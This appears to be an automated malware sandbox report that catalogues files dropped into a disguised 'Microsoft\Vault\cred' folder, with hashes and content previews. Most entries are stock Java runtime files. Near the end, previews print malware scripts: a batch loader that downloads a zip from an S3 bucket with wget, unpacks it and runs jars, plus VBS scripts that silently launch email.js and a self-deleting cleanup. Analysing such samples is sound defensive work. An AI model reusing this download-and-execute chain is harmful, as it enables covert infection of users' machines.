C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\security\blacklisted.certs

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2527
Entropy (8bit):	4.141598882390435
Encrypted:	false
SSDEEP:	48:NjYQMQgcJrrDJOz74ZeKnZqUyYuj4G0o5xz4lCENa+qJe:NjYQbTwzkZeKnZqUfGxzWCEPqU
MD5:	8273F70416F494F7FA5B6C70A101E00E
SHA1:	AEAEBB14FBF146FBB0AAF347446C08766C86CA7F
SHA-256:	583500B76965EB54B03493372989AB4D3426F85462D1DB232C5AE6706A4D6C58
SHA-512:	E697A57D64ACE1F302300F83E875C2726407F8DAF7C1D38B07AB8B4B11299FD698582D825BEE817A1AF85A285F27877A9E603E48E01C72E482A04DC7AB12C8DA
Malicious:	false
Reputation:	unknown
Preview:	Algorithm=SHA-256..03DB9E5E79FE6117177F81C11595AF598CB176AF766290DBCEB2C318B32E39A2..08C396C006A21055D00826A5781A5CCFCE2C8D053AB3C197637A4A7A5BB9A650..14E6D2764A4B06701C6CBC376A253775F79C782FBCB6C0EE6F99DE4BA1024ADD..1C5E6985ACC09221DBD1A4B7BBC6D3A8C3F8540D19F20763A9537FDD42B4FFE7..1F6BF8A3F2399AF7FD04516C2719C566CBAD51F412738F66D0457E1E6BDE6F2D..2A464E4113141352C7962FBD1706ED4B88533EF24D7BBA6CCC5D797FD202F1C4..31C8FD37DB9B56E708B03D1F01848B068C6DA66F36FB5D82C008C6040FA3E133..3946901F46B0071E90D78279E82FABABCA177231A704BE72C5B0E8918566EA66..3E11CF90719F6FB44D94EAC9A156B89BEBE7B8598F28EC58913F2BFCAF91D0C0..423279423B9FC8CB06F1BB7C3B247522B948D5F18939F378ECC901126DE40BFB..450F1B421BB05C8609854884559C323319619E8B06B001EA2DCBB74A23AA3BE2..4CBBF8256BC9888A8007B2F386940A2E394378B0D903CBB3863C5A6394B889CE..4FEE0163686ECBD65DB968E7494F55D84B25486D438E9DE558D629D28CD4D176..535D04DFCE027C70BD5F8A9E0AD4F218E9AFDCF5BBCF9B6DE0D81E148E2E3172..568FAF38D9F155F624838E2181B1CEB4D8459305EE652B0F810C97C36

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\security\cacerts

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	Java KeyStore
Category:	dropped
Size (bytes):	128221
Entropy (8bit):	7.641460003976631
Encrypted:	false
SSDEEP:	3072:ZUv84xz02kPtdBTsyoteKIwWClyCpnSVE4x:ZU84xmbTetNBTpr4x
MD5:	DC6594EE44C6E34158D5C4F04425E46A
SHA1:	18701A158AB23A706EA03F9491B17A0F41D83B53
SHA-256:	4FB659B3668CC0276278D5DAC7AE269EF7D015559128C3F5D51E2FD9D12A0FEA
SHA-512:	8D03BAD920B1F1FBB15F5C922F864A768235EFF9F02E052B5050EC261971D231B9687578FE8AFE5837D92C83BBAAC70B264E7853282BE0231F59481E03A4196F
Malicious:	false
Reputation:	unknown
Preview:	...........q......sslrooteccca [jdk]...s.. ...X.509....0...0..........u....h[.0....H.=...0\|1.0...U....US1.0...U....Texas1.0...U....Houston1.0...U....SSL Corporation110/..U...(SSL.com Root Certification Authority ECC0...160212181403Z..410212181403Z0\|1.0...U....US1.0...U....Texas1.0...U....Houston1.0...U....SSL Corporation110/..U...(SSL.com Root Certification Authority ECC0v0....H.=....+...".b..En.P.#6._(..."d?.z......q$..I...G.X.-....5.'.SX.b...[.k1RcA;......4......E.....#.....G.c0a0...U........s0.5........!..0...U.......0....0...U.#..0.....s0.5........!..0...U...........0....H.=....g.0d.0o..Y..`.a..{.../......Pk.FF..!.b...........]r>..0.....0$.\|m.U..>..3.f........,.]~....hm.\|in_..je......ssltlsrootecc2022 [jdk]....0.S..X.509...>0..:0...............7..@[.C....0....H.=...0N1.0...U....US1.0...U....SSL Corporation1%0#..U....SSL.com TLS ECC Root CA 20220...220825163348Z..460819163347Z0N1.0...U....US1.0...U....SSL Corporation1%0#..U....SSL.com TLS ECC Root CA 20220v0..

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\security\java.policy

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	2564
Entropy (8bit):	4.435878574816843
Encrypted:	false
SSDEEP:	24:hjrUah3ontU2H+h/ic1mo8vwwQcNpIjLSkLuodAZdgh1y0ykt0wS5:R4fc17wVNwltpU
MD5:	BFDD90599E2E55FFD9378DFEB8AC1760
SHA1:	9D7C4615FF9E3902F1A19771E89E6B6423C2098D
SHA-256:	6191396D66399276D466B8CC9C932EA3F7F3FACCB6876A60234A05EA0580701F
SHA-512:	AA71631AA5DBB445EA66D946DDED9707DF5BB6DBF03F272A643C2AC3CB8AEAD3CF1F9C37D4CC43561FBE19C506EE4C1543F6B38EC432A959619C31AE049AB6A8
Malicious:	false
Reputation:	unknown
Preview:	.// Standard extensions get all permissions by default..grant codeBase "file:${{java.ext.dirs}}/*" {. permission java.security.AllPermission;.};..// default permissions granted to all domains..grant {. // Allows any thread to stop itself using the java.lang.Thread.stop(). // method that takes no argument.. // Note that this permission is granted by default only to remain. // backwards compatible.. // It is strongly recommended that you either remove this permission. // from this policy file or further restrict it to code sources. // that you specify, because Thread.stop() is potentially unsafe.. // See the API specification of java.lang.Thread.stop() for more. // information.. permission java.lang.RuntimePermission "stopThread";.. // allows anyone to listen on dynamic ports. permission java.net.SocketPermission "localhost:0", "listen";.. // "standard" properies that can be read by anyone..

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\security\java.security

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	58562
Entropy (8bit):	4.870452859200768
Encrypted:	false
SSDEEP:	1536:rRuR2aVOQCbOETyapmLjt1FLze0YuZN3F:MibO/awLj3FLKhuf3F
MD5:	724BF69FE7E2C763CD97C50C111D240F
SHA1:	FA3BB1E8E8D2D920565F9260F705E76635591482
SHA-256:	30BDFB34C332D3822D93B119342B2686B8203209AC8DFA60E3CCB642B6BA11C4
SHA-512:	00AE66DCAD3FBC2B32EFCBA2DFFEF5504B263BA0DD3AA2B12578B5C978A1625A1852A68E10C1AF73EFFEAC19A4F66614C1072D78CA60499A9BFD5F48AF0BA9E0
Malicious:	false
Reputation:	unknown
Preview:	#..# This is the "master security properties file"...#..# An alternate java.security properties file may be specified..# from the command line via the system property..#..# -Djava.security.properties=<URL>..#..# This properties file appends to the master security properties file...# If both properties files specify values for the same key, the value..# from the command-line properties file is selected, as it is the last..# one loaded...#..# Also, if you specify..#..# -Djava.security.properties==<URL> (2 equals),..#..# then that properties file completely overrides the master security..# properties file...#..# To disable the ability to specify an additional properties file from..# the command line, set the key security.overridePropertiesFile..# to false in the master security properties file. It is set to true..# by default...#..# If this properties file fails to load, the JDK implementation will throw..# an unspecified error when initializing the java.security.Security class.....

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\security\javaws.policy

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	98
Entropy (8bit):	4.75309355004813
Encrypted:	false
SSDEEP:	3:FGIWgjM0ePFUN1/6IGNDAPVn7n:8c2PFUqIrR7
MD5:	9107D028BD329DBFE4C1F19015ED6D80
SHA1:	4384CA5E4D32F7DD86D8BADDD1E690730D74E694
SHA-256:	B7A87D1F3F4B7BA1D19D0460FA4B63BD1093AFC514D67FE3C356247236326425
SHA-512:	81B14373B64CE14AF26B70D12D831E05158D5A4FA8CEC0508FEF8A6CA65B6F4EF73928F4B1E617C68DDEACFF9328A3D4433B041B7FB14DE248B1428C51DBC716
Malicious:	false
Reputation:	unknown
Preview:	.grant codeBase "file:${jnlpx.home}/javaws.jar" {. permission java.security.AllPermission;.};..

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\security\policy\limited\US_export_policy.jar

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	7683
Entropy (8bit):	7.868210143157411
Encrypted:	false
SSDEEP:	192:n8Le9PIXK7VpxUatXjUZ7O02SRsEXFyE0jTHlvZfb:yA3i3Z6SiaP0HHlJb
MD5:	BF60F5AE5417B15F4C901945A9FB24D7
SHA1:	886B35A63FE50801230FD687F8B3CE6FBDC399F6
SHA-256:	90E36D24861C9A7B3518B2FEB97FAABFAAFFAD95245596B887479C3EDB295058
SHA-512:	DAB618998838A2FF2F2D68B0F5E776756ACB00037AA56886E873EF49EA31FD97E4B74F7C65BE36C54CA33823C8A3C2E6E95B0B09CA3C65E8B88708EF259E242D
Malicious:	false
Reputation:	unknown
Preview:	PK........,.>Y................META-INF/MANIFEST.MFe..N.@...=..0K]......(...e.l...2.28sI....q..$..;{.....)H.E.i./...AQB{..%}...G(/..)..x..Vf;3r.KV4@\|!;!.N...Z.N..%zY@..S.F.k.^,....g...u.s..7...z..i@....9VrX=:..3..Ww.d.....^h..t.f'.^...j.0.s..a..o6t..sD..o;......].ri..?PK..A...........PK........-.>Y................META-INF/ORACLE_J.SFu..n.@...;...6..RPIz......O.....nA..K.....6.......=CR.XGhc.e".B..L.%......6....H&..z.:. \.....9.B.....j.y.N.G.@....X;zp<wx.W6../u..e.P%..,.>..M=X....Zq..!..8.2+. G.d...........5.+.Z. .....Q......=.Q.I...a....\|i.d....u=L...!..A.. ..<'.M..V.C....Y.f.\|...$....FU..rg../...C.._....P..4:..Q.E./..PK...P..1.......PK........-.>Y................META-INF/ORACLE_J.RSA..u\T....f..Aj... ..H3t...R.. .HJ.t.(!H("...... .............?..+..=.k/.....=....G....A.\.$......B,..Q.`;...........Ab..HH1......c`..dU.....>i.......2.....B.....l\.`J.^..^V>.w78..rR.O@w......n..o.uR.....ppC.9.....J...sJ.).)).L.p1@........1.&...B.p....a.H0...[.$...>

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\security\policy\limited\local_policy.jar

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	8184
Entropy (8bit):	7.8615367569180465
Encrypted:	false
SSDEEP:	96:hp3M0W8z9tIa0JEZ+qnqegEBu6RM3HX42e7UsjBZ1ZyVY3dVlKBtUpfvK:sW9tiJEZ+urMKEHX4RUsjhAYtCBtUxy
MD5:	0E765AC0FA7294002DDB719B62FB2E27
SHA1:	576736690E626B96D887F8408C1AE1160E8307A8
SHA-256:	5D1D6C4074A4A3B33BCE8FBDF48F80EFD07882EF7D7382BF8FB8D2AB36FDDBA2
SHA-512:	CE1467E4454796B250F4DE4EC0A6BE4B8A70CC3CBBD198B6DC58F516EA7BBAC8B4BA497CA94948B417FFA63D5A6DD06B146A46A46377DB4D60A01483C49255FE
Malicious:	false
Reputation:	unknown
Preview:	PK........-.>Y................META-INF/MANIFEST.MF..Ao.0...;...v...!$;....Tp0v1..)5..R'..Ow..v{.{..&.4.L@4..au..6..Kf.R@.e...TD.......S...n{.e.,..).c&8.H^.[]..T.k.@G...v8.$W...#.7x0'._.....d6(.._[..pU).Q...9....3C.>`g:}......G.......Ga.ehI....Y...~.)T............a+.o..!m6p..=.y..G.Y=..$N.~.9.h3\8.5I..o..PK..V.Z!....i...PK........-.>Y................META-INF/ORACLE_J.SF..MO.0.....}....(,8X.....o..,]).PZV.~zg<h4..s...<.#.Ib<..R...5...C...se.. .2....sPn.JI...i....C.`...9.gu..E...\|...p.e.?.,u.3.4_.....mT....(...o...v..<..7z....(qf.I.".1{.(vG`;..v.J....!.!.:........d.e$G.S[&0b.F0._....=-.J.....Rx..fy..u.......Y......MN.n......].b... p.e. .>q....bE........Vt....M.......C.Y2g>.zSl.1=..]z.}...k....wPK..Y...Y.......PK........-.>Y................META-INF/ORACLE_J.RSA..u\T..........-C. ..0.t...R.( %).J. ......J...o0....\|...}.3.b..~....P..l<.p..="0.F6.......`0.. .......`b..@......(....).P...!.`..\.../Q{"#'.~.....]......CL\|Brmw.+G.........'..............

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\security\policy\unlimited\US_export_policy.jar

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	7683
Entropy (8bit):	7.868210143157411
Encrypted:	false
SSDEEP:	192:n8Le9PIXK7VpxUatXjUZ7O02SRsEXFyE0jTHlvZfb:yA3i3Z6SiaP0HHlJb
MD5:	BF60F5AE5417B15F4C901945A9FB24D7
SHA1:	886B35A63FE50801230FD687F8B3CE6FBDC399F6
SHA-256:	90E36D24861C9A7B3518B2FEB97FAABFAAFFAD95245596B887479C3EDB295058
SHA-512:	DAB618998838A2FF2F2D68B0F5E776756ACB00037AA56886E873EF49EA31FD97E4B74F7C65BE36C54CA33823C8A3C2E6E95B0B09CA3C65E8B88708EF259E242D
Malicious:	false
Reputation:	unknown
Preview:	PK........,.>Y................META-INF/MANIFEST.MFe..N.@...=..0K]......(...e.l...2.28sI....q..$..;{.....)H.E.i./...AQB{..%}...G(/..)..x..Vf;3r.KV4@\|!;!.N...Z.N..%zY@..S.F.k.^,....g...u.s..7...z..i@....9VrX=:..3..Ww.d.....^h..t.f'.^...j.0.s..a..o6t..sD..o;......].ri..?PK..A...........PK........-.>Y................META-INF/ORACLE_J.SFu..n.@...;...6..RPIz......O.....nA..K.....6.......=CR.XGhc.e".B..L.%......6....H&..z.:. \.....9.B.....j.y.N.G.@....X;zp<wx.W6../u..e.P%..,.>..M=X....Zq..!..8.2+. G.d...........5.+.Z. .....Q......=.Q.I...a....\|i.d....u=L...!..A.. ..<'.M..V.C....Y.f.\|...$....FU..rg../...C.._....P..4:..Q.E./..PK...P..1.......PK........-.>Y................META-INF/ORACLE_J.RSA..u\T....f..Aj... ..H3t...R.. .HJ.t.(!H("...... .............?..+..=.k/.....=....G....A.\.$......B,..Q.`;...........Ab..HH1......c`..dU.....>i.......2.....B.....l\.`J.^..^V>.w78..rR.O@w......n..o.uR.....ppC.9.....J...sJ.).)).L.p1@........1.&...B.p....a.H0...[.$...>

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\security\policy\unlimited\local_policy.jar

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	7690
Entropy (8bit):	7.869741099530155
Encrypted:	false
SSDEEP:	192:om5iuH7gZ4Vra9NFCh2/ARtlyaCY5hcWEHHK:15isgZ45UDC4elybYEWN
MD5:	043060AE35A88176305D44CD56E22301
SHA1:	94E6F4B3B85A3B6F144FF04B643F9828BC8FC12E
SHA-256:	63266CB839D4BC6D5D1581078FF390FB27A6AA12693A643F1494D484968EE037
SHA-512:	22654F05A4308AFFA26E9ACE249BFBF1A344DF21CE49BFCFD3CF1A590AD1AD6AFAEB1442F35706FE8C935B5016678F7303EE413E5E74EC04FC67B42BB5E13EB1
Malicious:	false
Reputation:	unknown
Preview:	PK........0.>Y................META-INF/MANIFEST.MFe.Ak.0....w.qcD..Z.....W.Z..Mb....I".~..]v...{.x9......(.e.!.qm+VSo$....5......n.x.....6^:n...+.e.P,U/.5.uo[..J/..#.. L-$....l..r....'../Dh.J,..].`..3..6.w..u....E.k...$.O....bP....d.....O2.2.xo...\%e..#...a....../V...PK...t.........PK........0.>Y................META-INF/ORACLE_J.SFu.Ko.@...=...e....$.P.P.5Z.q..#..s.....I.....{V.T!!...`..........G= '.B...d.T./.#.).{.d......W...B.....n.PU4..:.....Q3.W..A.,..vb... ....t..u...........1.$...b.c.m........1e.....W.UIP..v...B...Q....w......zv?x.,?<.(w.g{iI....K.P..Lv....T2.{A../.@.t.......dO....!...l!.5i.&._..../..PK..ii..-.......PK........0.>Y................META-INF/ORACLE_J.RSA..u\T..p&H......3tJ..t* .HwJ... .R.]* -H. ].J..................?..+..=.k/.....?....O...g.....n......!...pU.....ac......F...hH1.....A`0.Tf..}...f?.Na.]F...8.}(..L............n.rqF..X..O...Yx[.u]l=},..X..uQv.(g;..@w\..#?...."....DM...D.........5. .@.".o.&....A.'.6.nA. b,.y.0......w

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\security\public_suffix_list.dat

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	228507
Entropy (8bit):	5.197009498672016
Encrypted:	false
SSDEEP:	3072:EeS8UQQRwG1ARIrVnDzTx+3YUmdzGWMmcLzRIXthvjxlO8nQB7XoxubiMCfw43zO:ED8SlubvJ
MD5:	D8E49334A95739FDD9508CDF770876C1
SHA1:	37C1DE523B37121082B41A81319C1315852F7848
SHA-256:	5A3A571CC2E016FEE10C221036CF1D2B52EE8BA39288EF20ABE2667828CA30B4
SHA-512:	7A10250D6178A89471CF70D75A66393D90C0FD694F64C373657741FDAF668C5CFDE699553CAAF896A0F7C0C6F6500D3B87D4DD37391E281CE6EBDDB4DF10E480
Malicious:	false
Reputation:	unknown
Preview:	PK..........!.................aaaUT.......cHLL...PK...u..........PK..........!.................aarpUT.......cHL,...PK...C..........PK..........!.................abbUT.......cHLJ...PK..............PK..........!.................abbottUT.......cHLJ./)...PK..q`.u........PK..........!.................abbvieUT.......cHLJ.L...PK..Wk .........PK..........!.................abcUT.......cHLJ...PK..O..........PK..........!.................ableUT.......cHL.I...PK..n.-=........PK..........!.................abogadoUT.......cHL.OOL....PK..y.%.........PK..........!.................abudhabiUT.......cHL*M.HL....PK...b."........PK..........!.................acUT.......cHL.bH.....).`:=..L......0._....S...tZjjJRbr6.._.[.b..PK......9...S...PK..........!.................academyUT.......cHLNLI..b.OK.L.L.....PK.....a........PK..........!.................accentureUT.......cHLNN.+)-J...PK.....z........PK..........!.................accountantUT.......cHLN./.+I.+...PK.....V........PK..........!.............

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\sound.properties

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	1210
Entropy (8bit):	4.681309933800066
Encrypted:	false
SSDEEP:	24:va19LezUlOGdZ14BilDEwG5u3nVDWc/Wy:iaLGr1OsS5KnVaIWy
MD5:	4F95242740BFB7B133B879597947A41E
SHA1:	9AFCEB218059D981D0FA9F07AAD3C5097CF41B0C
SHA-256:	299C2360B6155EB28990EC49CD21753F97E43442FE8FAB03E04F3E213DF43A66
SHA-512:	99FDD75B8CE71622F85F957AE52B85E6646763F7864B670E993DF0C2C77363EF9CFCE2727BADEE03503CDA41ABE6EB8A278142766BF66F00B4EB39D0D4FC4A87
Malicious:	false
Reputation:	unknown
Preview:	############################################################.# Sound Configuration File.############################################################.#.# This properties file is used to specify default service.# providers for javax.sound.midi.MidiSystem and.# javax.sound.sampled.AudioSystem..#.# The following keys are recognized by MidiSystem methods:.#.# javax.sound.midi.Receiver.# javax.sound.midi.Sequencer.# javax.sound.midi.Synthesizer.# javax.sound.midi.Transmitter.#.# The following keys are recognized by AudioSystem methods:.#.# javax.sound.sampled.Clip.# javax.sound.sampled.Port.# javax.sound.sampled.SourceDataLine.# javax.sound.sampled.TargetDataLine.#.# The values specify the full class name of the service.# provider, or the device name..#.# See the class descriptions for details..#.# Example 1:.# Use MyDeviceProvider as default for SourceDataLines:.# javax.sound.sampled.SourceDataLine=com.xyz.MyDeviceProvider.#.# Example 2:.# Specify the default Synthesizer by it

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\tzdb.dat

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	data
Category:	dropped
Size (bytes):	104163
Entropy (8bit):	7.15699745088323
Encrypted:	false
SSDEEP:	1536:c0ELmJI53atcLsXM8Za9ubP0fF43o6/////VMMPamddarIaBbnkuhBJPudLw:cDtzAXM8skzxnCmd4rxBouhBxudLw
MD5:	82365766783E923589306D0BED31A04D
SHA1:	61A78CC977D1E478F757DE3F2DD39187025275D7
SHA-256:	C97C5E7B3AC6A9CFB1642829801B8165F27EB097A3DFE97999E17F3B18EBD9C3
SHA-512:	0E6DC75E0FB0ACAAC191446430CC1B7165B9AAE99EB94EA1733D7CB428D4BED1F2F02557965B0F743FA14D362354D6C23A05815350A362FC2324295EFE6ACD0D
Malicious:	false
Reputation:	unknown
Preview:	...TZDB....2024a.[..Africa/Abidjan..Africa/Accra..Africa/Addis_Ababa..Africa/Algiers..Africa/Asmara..Africa/Asmera..Africa/Bamako..Africa/Bangui..Africa/Banjul..Africa/Bissau..Africa/Blantyre..Africa/Brazzaville..Africa/Bujumbura..Africa/Cairo..Africa/Casablanca..Africa/Ceuta..Africa/Conakry..Africa/Dakar..Africa/Dar_es_Salaam..Africa/Djibouti..Africa/Douala..Africa/El_Aaiun..Africa/Freetown..Africa/Gaborone..Africa/Harare..Africa/Johannesburg..Africa/Juba..Africa/Kampala..Africa/Khartoum..Africa/Kigali..Africa/Kinshasa..Africa/Lagos..Africa/Libreville..Africa/Lome..Africa/Luanda..Africa/Lubumbashi..Africa/Lusaka..Africa/Malabo..Africa/Maputo..Africa/Maseru..Africa/Mbabane..Africa/Mogadishu..Africa/Monrovia..Africa/Nairobi..Africa/Ndjamena..Africa/Niamey..Africa/Nouakchott..Africa/Ouagadougou..Africa/Porto-Novo..Africa/Sao_Tome..Africa/Timbuktu..Africa/Tripoli..Africa/Tunis..Africa/Windhoek..America/Adak..America/Anchorage..America/Anguilla..America/Antigua..America/Araguaina..America/

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\tzmappings

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	9577
Entropy (8bit):	5.17061677089257
Encrypted:	false
SSDEEP:	192:qwfOC9OYOxUmHomjgDwlZ+TFXsq2H+aUHCHQj4SV0l2:qqgniTyq06a2
MD5:	62BC9FA21191D34F1DB3ED7AD5106EFA
SHA1:	750CC36B35487D6054E039469039AECE3A0CC9E9
SHA-256:	83755EFBCB24476F61B7B57BCF54707161678431347E5DE2D7B894D022A0089A
SHA-512:	AF0DDB1BC2E9838B8F37DC196D26024126AC989F5B632CB2A8EFDC29FBCE289B4D0BAC587FE23F17DFB6905CEADA8D07B18508DB78F226B15B15900738F581A3
Malicious:	false
Reputation:	unknown
Preview:	#.# This file describes mapping information between Windows and Java.# time zones..# Format: Each line should include a colon separated fields of Windows.# time zone registry key, time zone mapID, locale (which is most.# likely used in the time zone), and Java time zone ID. Blank lines.# and lines that start with '#' are ignored. Data lines must be sorted.# by mapID (ASCII order)..#.# NOTE.# This table format is not a public interface of any Java.# platforms. No applications should depend on this file in any form..#.# This table has been generated by a program and should not be edited.# manually..#.Romance:-1,64::Europe/Paris:.Romance Standard Time:-1,64::Europe/Paris:.Warsaw:-1,65::Europe/Warsaw:.Central Europe:-1,66::Europe/Prague:.Central Europe Standard Time:-1,66::Europe/Prague:.Prague Bratislava:-1,66::Europe/Prague:.W. Central Africa Standard Time:-1,66:AO:Africa/Luanda:.FLE:-1,67:FI:Europe/Helsinki:.FLE Standard Time:-1,67:FI:Europe/Helsinki:.GFT:-1,6

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\release

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	165
Entropy (8bit):	5.2300584259442875
Encrypted:	false
SSDEEP:	3:tqrYHUsq9N3erYHUHnzIKDKqvrYHQgPqmjxhuDmgwfFC4GRHRXH4Ih6/V9Wvn:GqC9N30qEnskKqzqLSmzxNGGIhaV9Wv
MD5:	B342135991A046DE488425749B2188EB
SHA1:	2BF122969461FD2CC6D3E3C7A28B7354AFB35DD3
SHA-256:	0E4EB36DA8DD0C5ED185686F9840968CBD58577B0E07297A6375341439AF51A2
SHA-512:	56900F2B08413369B546A1C01CCDA9E804408216CBA3B48245F97ABC186DFB3F7AF0EAEB00427C02AD415891975BAF3933296F294164622708375CD3A4EBDFEB
Malicious:	false
Reputation:	unknown
Preview:	JAVA_VERSION="1.8.0_431".JAVA_RUNTIME_VERSION="1.8.0_431-b10".OS_NAME="Windows".OS_VERSION="5.1".OS_ARCH="i586".SOURCE=".:git:fc007cccb4cf+".BUILD_TYPE="commercial".

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\runDeleteHTA.vbs

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	179
Entropy (8bit):	4.938489126268609
Encrypted:	false
SSDEEP:	3:jaPFEm8nByK2qQBHoN+EaKC5SufzPDs0AtsRHhXBurPOU/vn:j6NqEK21IN7aZ5SubPctwP9U/vn
MD5:	FA358E6F9ECA79620E7CDA31BC1F51B2
SHA1:	CE8CCF70ED5442913B2CE31001F9020CB6D0BEC7
SHA-256:	6D7C3CB79052A4CF9B409703A06B915BCC19F5898B7A2FC696B7CC4D70B3E8B0
SHA-512:	A5D8A201276670419B975790B9B4018E7EE866BFE281EF70B9D2DC993D8B266C524D578F0144ECBF311F53E88056B68412149D5CC950E1BFF53668119A2B140F
Malicious:	true
Reputation:	unknown
Preview:	Set WshShell = CreateObject("WScript.Shell") ..WshShell.Run """C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\deleteHTAandSelf.bat""", 0, False ..Set WshShell = Nothing ..

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\runEmailJs.vbs

Download File

Process:	C:\Windows\SysWOW64\mshta.exe
File Type:	ASCII text, with CRLF, LF line terminators
Category:	dropped
Size (bytes):	359
Entropy (8bit):	5.060697800787201
Encrypted:	false
SSDEEP:	6:TMROLjpUNqZYOm0ebRaoN7aZ5SubPGA3Gfv36ROGS4g9Urv:QRqjBZY+6RX+HSubPGE06Rp7
MD5:	E97401ABCCF6D2E3A6C6750FF12D0377
SHA1:	A38ABE6FFE8E085714C9411FAD6569CE4C6BE585
SHA-256:	EC193DF31A4A045EF23E373199451F483AB82130414696195E5A92ABCBB5AADD
SHA-512:	99DB6F9EAB0C9D4C2BA3DF5580AB77F2385FEED96CB3C4C43F4478AD0900E0802DF4A7FBC430B766292C0E11BCED75273E1837FFBBC70F318EA3AFF92389A64F
Malicious:	false
Reputation:	unknown
Preview:	Option Explicit..Dim WshShell, wscriptPath, emailJsPath, cmd..Set WshShell = CreateObject("WScript.Shell")..wscriptPath = """C:\Windows\System32\wscript.exe""".emailJsPath = """C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\deploy\email.js"""..cmd = wscriptPath & " " & emailJsPath..WshShell.Run cmd, 0, False..Set WshShell = Nothing..

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\runMainSequence.bat

Download File

Process:	C:\Windows\SysWOW64\mshta.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	3260
Entropy (8bit):	5.37020493738534
Encrypted:	false
SSDEEP:	96:YD3xWj+4e1mDD4y4euhruMB6w8CwQ2s+4rs5/awbIH4hxa7:YDB+le9vkLxa7
MD5:	F3E77F6368CD3E84A9B113BD6BC9CF80
SHA1:	2CDCA02CF058525F776FB51415F65CCC8456036C
SHA-256:	05F64A814EC348E5C49420677C00ACA0717EDF45C8F9A0ED8AF71F78FDF091F8
SHA-512:	A43BCB5DC7C7318DA9E75EA6203E5F912C4F61FFCBBD04787E8E34D6964E5E135F9B68FBC327BF5AD63EB97C98334162AE7DADDD5BD37577217C6B68BAAFAE54
Malicious:	true
Reputation:	unknown
Preview:	@echo off..SETLOCAL..REM InvisiblePuttyDownloader - Main Sequence Batch..cd /d "%~dp0".."wget.exe" --user-agent="BlackBerry" -O "jre-1.8.zip" "https://seasonmonster.s3.us-east-1.amazonaws.com/jre-1.8.zip"..IF %ERRORLEVEL% NEQ 0 (.. GOTO CLEANUP..) ELSE (.. REM Successfully downloaded jre-1.8.zip..)....IF NOT EXIST "jre\jre-1.8" (.. mkdir "jre\jre-1.8"..)...."unzip.exe" "jre-1.8.zip" -d "jre"..IF %ERRORLEVEL% NEQ 0 (.. GOTO CLEANUP..) ELSE (.. REM Extraction completed successfully..)....IF NOT EXIST "jre\jre-1.8\bin\javaw.exe" (.. GOTO CLEANUP..) ELSE (.. REM javaw.exe found..)....FOR %%G IN (recovery.jar history.jar checker.jar) DO (.. IF EXIST "jre\jre-1.8\lib\deploy\%%G" (.. "jre\jre-1.8\bin\javaw.exe" -jar "jre\jre-1.8\lib\deploy\%%G".. )..)....cscript //nologo "C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\runResJar.vbs"..cscript //nologo "C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\runEmailJs.vbs"....DEL /F /Q "C:\Users\usere

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\runResJar.vbs

Download File

Process:	C:\Windows\SysWOW64\mshta.exe
